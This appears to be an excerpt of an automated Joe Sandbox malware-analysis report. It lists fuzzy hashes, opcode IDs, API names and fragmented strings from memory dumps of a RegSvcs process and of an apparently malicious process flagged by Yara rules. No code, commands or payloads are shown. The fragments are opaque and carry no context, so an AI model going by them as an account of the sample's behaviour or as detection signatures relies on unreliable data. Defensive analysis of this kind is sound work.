                                                                          • Opcode ID: c5080765502bf6dc7be107d9543e7ae5f1d7972318cd4d484957d28f7ca33576
                                                                          • Instruction ID: b7d34b8b39d6e64646bcccff03cbfcc1e526c135d41a45225c8090a618cac80e
                                                                          • Opcode Fuzzy Hash: c5080765502bf6dc7be107d9543e7ae5f1d7972318cd4d484957d28f7ca33576
                                                                          • Instruction Fuzzy Hash: F9E1C4706083468FDB19CFA8D880B6ABBF5BFC8318F44496DE9958B285D770E944CF52

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                          • Instruction ID: 29756dc2e69fc6a16e1ea0c907cc392b281841179cca39f741f793cce2c74249
                                                                          • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                          • Instruction Fuzzy Hash: 9081C170F092498EEF2D8E6CC8517FEBBAEAF45320F184119D951E72D1C73A8860CB59
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$@
                                                                          • API String ID: 3446177414-1194432280
                                                                          • Opcode ID: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                                          • Instruction ID: c67ad88442727b8bdbba4f81649f13f860a41032ee50c5335b197ea493dab8a6
                                                                          • Opcode Fuzzy Hash: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                                          • Instruction Fuzzy Hash: FA810A71D002799BDB3ADB54CC44BEEB6B8AF49754F1041DAEA19B7240D7709E84CFA0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0Iv$0Iv$0Iv$X
                                                                          • API String ID: 3446177414-728256981
                                                                          • Opcode ID: 0b5a195596d4910e255572a88fcb27f22f5e9aca73178592ad11a90d13e8d5c0
                                                                          • Instruction ID: 83a9face406ae775e1d3e281e2a23b828c22398b1aecc28350ecd0245eb814cf
                                                                          • Opcode Fuzzy Hash: 0b5a195596d4910e255572a88fcb27f22f5e9aca73178592ad11a90d13e8d5c0
                                                                          • Instruction Fuzzy Hash: F531BF3190021AFBCF26CF58E848B8D7BB9ABD9758F054019FD0596245D7728AB0DF86
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                          • API String ID: 3446177414-56086060
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011A4899
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011A4888
                                                                          • LdrpCheckRedirection, xrefs: 011A488F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 3446177414-3154609507
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                          • API String ID: 3446177414-3526935505
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $
                                                                          • API String ID: 3446177414-3993045852
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                          • String ID:
                                                                          • API String ID: 4281723722-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Bl$l
                                                                          • API String ID: 3446177414-208461968
                                                                          • Opcode ID: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                                          • Instruction ID: b1fa001f40a4836feb827fe0c9561b4f7f275e2f30b9a33e85191523155cb5e2
                                                                          • Opcode Fuzzy Hash: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                                          • Instruction Fuzzy Hash: 57A1F470A003298BEF39DB98E890BEDB7B5BB84704F4540E9D90967649CB74AEC4CF51
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 01165E34
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__start
                                                                          • String ID: pow
                                                                          • API String ID: 3213639722-2276729525
                                                                          • Opcode ID: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                                          • Instruction ID: a24f2c32d1231f0ea3efd295b11bf1194a26fedd06aa54f94d9490656e6b6fb7
                                                                          • Opcode Fuzzy Hash: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                                          • Instruction Fuzzy Hash: B6517871B1C202E6DB6DB61CD9053796F9DAB00790F10C968E0D6C6299EB3784B5874B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$Flst
                                                                          • API String ID: 0-758220159
                                                                          • Opcode ID: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                                          • Instruction ID: 58b57e476f8c99679cb18f05f5ba7aa75b7dd15aa059e2006cc53edd52547216
                                                                          • Opcode Fuzzy Hash: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                                          • Instruction Fuzzy Hash: DA51AEB1E00208CFDF6ACFA9C4886ADFBF4FF54354F15802AD4299B651EB719981CB80
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 0114D959
                                                                            • Part of subcall function 01124859: RtlDebugPrintTimes.NTDLL ref: 011248F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$
                                                                          • API String ID: 3446177414-233714265
                                                                          • Opcode ID: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                                          • Instruction ID: 46b7f513879388b5c23f774fff998f194c8c7b17eaf4997bb01a722e9fec448e
                                                                          • Opcode Fuzzy Hash: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                                          • Instruction Fuzzy Hash: DE51F371E003469FEF2DDFE8E4887ADBBB2BF64B18F144059D5056B285DB70A945CB80
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $
                                                                          • API String ID: 3446177414-3993045852
                                                                          • Opcode ID: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                                          • Instruction ID: 62b650e1ecb5f85f0f1018edc3a7cd3503af8c20e34e6e9453abcf665463ece6
                                                                          • Opcode Fuzzy Hash: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                                          • Instruction Fuzzy Hash: B341BF75E0021AABDF1ADF99D884AEEBFB5FF48714F150019E920A7341C7709942CB90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0$0
                                                                          • API String ID: 3446177414-203156872
                                                                          • Opcode ID: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                                          • Instruction ID: d32f5d0d6553264fe2e6a66849e14fcf1450f8b62f9e4ca70320c8880b6f9660
                                                                          • Opcode Fuzzy Hash: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                                          • Instruction Fuzzy Hash: E6417CB16087069FC715CF68D484A1ABBE4BF88718F04493EF988DB345D771EA06CB96
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $#J$$$<]$=$?2$A$I$O$RH$X$Z=$\p$]$e$fP$g$ws$z${#$4$;
                                                                          • API String ID: 0-1685357701
                                                                          • Opcode ID: 7b8afc7e1087089fdd76c80a31368f98bbca0bf90f7143280b21b1f3a7d4e033
                                                                          • Instruction ID: 7f7994b757f61475a62f150e22ad09f7277d0fb580a4f859720df9a8cab56df6
                                                                          • Opcode Fuzzy Hash: 7b8afc7e1087089fdd76c80a31368f98bbca0bf90f7143280b21b1f3a7d4e033
                                                                          • Instruction Fuzzy Hash: 7F32C1B0D05228CBEF25CF89C8987DDBBB2FB95309F108599D10AAB381C7B55A85CF45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$O$S$\$s
                                                                          • API String ID: 0-3854637164
                                                                          • Opcode ID: aedcb172bcf1d272c6593fcfc82efabf1aca565fdd5d8fef47671a2227aa4118
                                                                          • Instruction ID: 156219990733968c4185f91f80699724dbbaa8d81b73b412a09ca5f6ae1aebe2
                                                                          • Opcode Fuzzy Hash: aedcb172bcf1d272c6593fcfc82efabf1aca565fdd5d8fef47671a2227aa4118
                                                                          • Instruction Fuzzy Hash: 4651A2B2914218ABDB90DF94EC84BEFB37CEB44714F044299EA0857140EB765A58CFA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6f6b1d0da6ab478632e89d2586a1308685cdf90f8762d503cce0a881c5f1ea6
                                                                          • Instruction ID: 7864dde3f4df6fc5a40796cbb0b89204525b4bb8cd8a7e1a20316a16bbd3dc8b
                                                                          • Opcode Fuzzy Hash: d6f6b1d0da6ab478632e89d2586a1308685cdf90f8762d503cce0a881c5f1ea6
                                                                          • Instruction Fuzzy Hash: 5B317CB1A50219AFDB04CF95DC81EEEBBBCEF49710F10414AFA05E6240E7B196458BA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 209dafb16dc51e22dec11edd2e50a09a1ef8b5ae61b9c658171ecf046d4ebff5
                                                                          • Instruction ID: 2831c2378562c85d1d7859914de2b11bb36fdd975bc1c017de3e26508a50e961
                                                                          • Opcode Fuzzy Hash: 209dafb16dc51e22dec11edd2e50a09a1ef8b5ae61b9c658171ecf046d4ebff5
                                                                          • Instruction Fuzzy Hash: 3F31FCB5A40248AFDB14DF98DD85EEFB7B9EF88300F108119F919A7240D770A911CFA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6974fb4f0529204329ad345bcf854dcbf0a57ebe356176fe14e29a8476b77d32
                                                                          • Instruction ID: 25fa5a245b485c8e68dbd49be0f1e93ea30deee14ee35b19f95e8271c7e6740f
                                                                          • Opcode Fuzzy Hash: 6974fb4f0529204329ad345bcf854dcbf0a57ebe356176fe14e29a8476b77d32
                                                                          • Instruction Fuzzy Hash: 78212CB5A41608AFDB14DF98DC85EAF77BDEF88310F104509F918AB280DB71A911CBA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65062cd4a63c7f0541ad4e8922017e40cc60bf5b20270eab7ca5cd1bc3b7a366
                                                                          • Instruction ID: 830444fbbc74dfd1dd7cff264869b5c60671dce6114f6d2bd1584a78010b58e2
                                                                          • Opcode Fuzzy Hash: 65062cd4a63c7f0541ad4e8922017e40cc60bf5b20270eab7ca5cd1bc3b7a366
                                                                          • Instruction Fuzzy Hash: 2D115AB13C03057BF7209A559C83FAB776D9B89F54F244015FB08AE2C1D6B5B8154AB8
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2479d296b99404069a9dea2c382727e7298d2a49910325e550ba3dc0d1a6bccc
                                                                          • Instruction ID: 4b2cd78d4db1d747bbb8cfc86b2e1cccca3c2d68e01bae2cc91d21dc66f2abd1
                                                                          • Opcode Fuzzy Hash: 2479d296b99404069a9dea2c382727e7298d2a49910325e550ba3dc0d1a6bccc
                                                                          • Instruction Fuzzy Hash: 5C21EDB6D0121CAF8B40DFA9D8419EFB7F9EF88210F14825BE909E7240E7705A058BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6013831a6e4d19f89a786911385c58dded79b15aae7d652d9208303fa71df454
                                                                          • Instruction ID: c36be8f98702ace6220b146dd9db171d8dca25b93c8a8e8eae922ed9c93f0e21
                                                                          • Opcode Fuzzy Hash: 6013831a6e4d19f89a786911385c58dded79b15aae7d652d9208303fa71df454
                                                                          • Instruction Fuzzy Hash: 07116371A413146FD714EF54DC45FEF77AEEB85710F004509F9186B280DB716911CBA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Strings
                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                          • String ID: 5$EYPb$F\Z[$PW~\$[QGZ$fTST$w@\Y$xZO\
                                                                          • String ID: L$S$\$a$c$e$l
                                                                          • String ID: $8$J$M$b$p$|
                                                                          • String ID: $8$J$M$p$|
                                                                          • String ID: $e$h$o$u
                                                                          • API String ID: 0-1623184870
                                                                          • String ID: $i$l$o$u
                                                                          • API String ID: 0-2051669658
                                                                          • String ID: $e$h$o$u
                                                                          • API String ID: 0-1623184870
                                                                          • String ID: :0=($:0=($;&5,$\$p|89
                                                                          • API String ID: 0-500816267
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                          • API String ID: 0-2877786613
                                                                          • String ID: 4$B$H$y
                                                                          • API String ID: 0-4138130969
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832